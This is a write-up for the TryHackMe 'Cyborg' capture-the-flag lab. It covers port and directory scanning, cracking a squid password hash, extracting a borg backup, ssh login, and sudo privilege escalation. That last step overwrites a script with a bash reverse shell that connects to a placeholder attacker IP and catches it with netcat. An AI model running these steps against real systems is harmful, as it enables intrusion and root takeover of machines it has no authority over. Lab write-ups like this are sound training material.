Cyborg

Room Details

TryHackMe Cyborg room contains:

• Service Discovery

• Web Content Discovery

• Hash Cracking

• Data Decompression

• Privilege Escalation

Target

• IP: 10.10.230.194

Service Discovery

• Scan for open ports with nmap

$ nmap -sC -sV -A -sS -Pn -oN nmap.txt 10.10.230.194
Nmap scan report for 10.10.230.194
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=7/10%OT=22%CT=1%CU=35008%PV=Y%DS=4%DC=T%G=Y%TM=62CAA3E
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M505ST11NW6%O2=M505ST11NW6%O3=M505NNT11NW6%O4=M505ST11NW6%O5=M505ST1
OS:1NW6%O6=M505ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M505NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   279.37 ms 10.2.0.1
2   ... 3
4   514.99 ms 10.10.230.194

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

• Services Discovered

  Service	Port	Version
  HTTP	80	Apache 2.4.18
  SSH	22	OpenSSH 7.2p2

• OS: Ubuntu from service description

• Answer Task 2 first three questions

Web Content Discovery

• Scan for directories using gobuster

  gobuster dir -u http://10.10.230.194 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt

• Directories Discovered

Dirs	Description	Files Found
/admin	homepage	from archive dropdown found archive.tar file
/etc	squid proxy	squid password and configuration files

Analyzing Directories

• From /etc found /etc/squid/passwd which contains password hash and squid config file /etc/squid/squid.conf

  # reading files
  
  # /etc/squid/passwd
  music_archive:{REDACTED}
  
  # /etc/squid/squid.conf
  auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
  auth_param basic children 5
  auth_param basic realm Squid Basic Authentication
  auth_param basic credentialsttl 2 hours
  acl auth_users proxy_auth REQUIRED
  http_access allow auth_users

Cracking Password Hash

• Store hash into a file passwd_hash.txt

• Crack the hash using hashcat

  john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

  squidward (music_archive)

• We've successfully found the password from the hash

Analyzing Tar file

• extract tar file

  tar -xvf archive.tar

• Found readme file which leads us to the borg documentation page

• We need to install borg to extract the files from the compressed format

• Install borg

  sudo apt install borgbackup -y

  For debian based For other distribution refer borg installation documentation

• decompress extracted files from archive.tar using borg

  borg extract ./home/field/dev/final_archive::music_archive

• After files are decompressed successfully, it data turns out to the home directory backup for alex's account

• Found Password from /home/alex/Documents/note.txt

  Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
  
  alex:{REDACTED}

Login with ssh

• Login using alex's

  ssh alex@10.10.230.194
  alex@10.10.230.194 password: # enter password from note.txt
  Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
  
  * Documentation: https://help.ubuntu.com
  * Management: https://landscape.canonical.com
  * Support: https://ubuntu.com/advantage
  
  27 packages can be updated.
  0 updates are security updates.
  
  The programs included with the Ubuntu system are free software;
  the exact distribution terms for each program are described in the
  individual files in /usr/share/doc/*/copyright.
  
  Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  applicable law.
  
  alex@ubuntu:~$

• We got access to Alex Account

Get User Flag

alex@ubuntu:~$ cat user.txt
flag{REDACTED}

Privilege Escalation

• Check for sudo exectuables

  alex@ubuntu:~$ sudo -l
  Matching Defaults entries for alex on ubuntu:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  
  User alex may run the following commands on ubuntu:
      (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

  We can run file /etc/mp3backups/backup.sh as with root privileges

• Check whether file is writable

  alex@ubuntu:~$ ls -la /etc/mp3backups/backup.sh
  -r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh

  We cannot write file, but user is alex, so we can change file permissions using chmod

• Allow all permissions to the files

  alex@ubuntu:~$ chmod 777 /etc/mp3backups/backup.sh

  Note: Allowing all users rwx permissions isn't a good practice, but for ease, I've provided them rights

• Overwrite file with Bash Reverse Shell on alex's machine

  alex@ubuntu:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/backup.sh

  Reverse shell will connect to attacker's machine on port 4444

• Start netcat on attacker's machine

  nc -nlvp 4444

• Execute bash script from target machine

  alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh

• Now, we've successfully rooted the machine

  $ nc -nlvp 4444
  listening on [any] 4444 ...
  connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.230.194] 36492
  root@ubuntu:~#

Get Root Flag

root@ubuntu:~# cat root.txt
flag{REDACTED}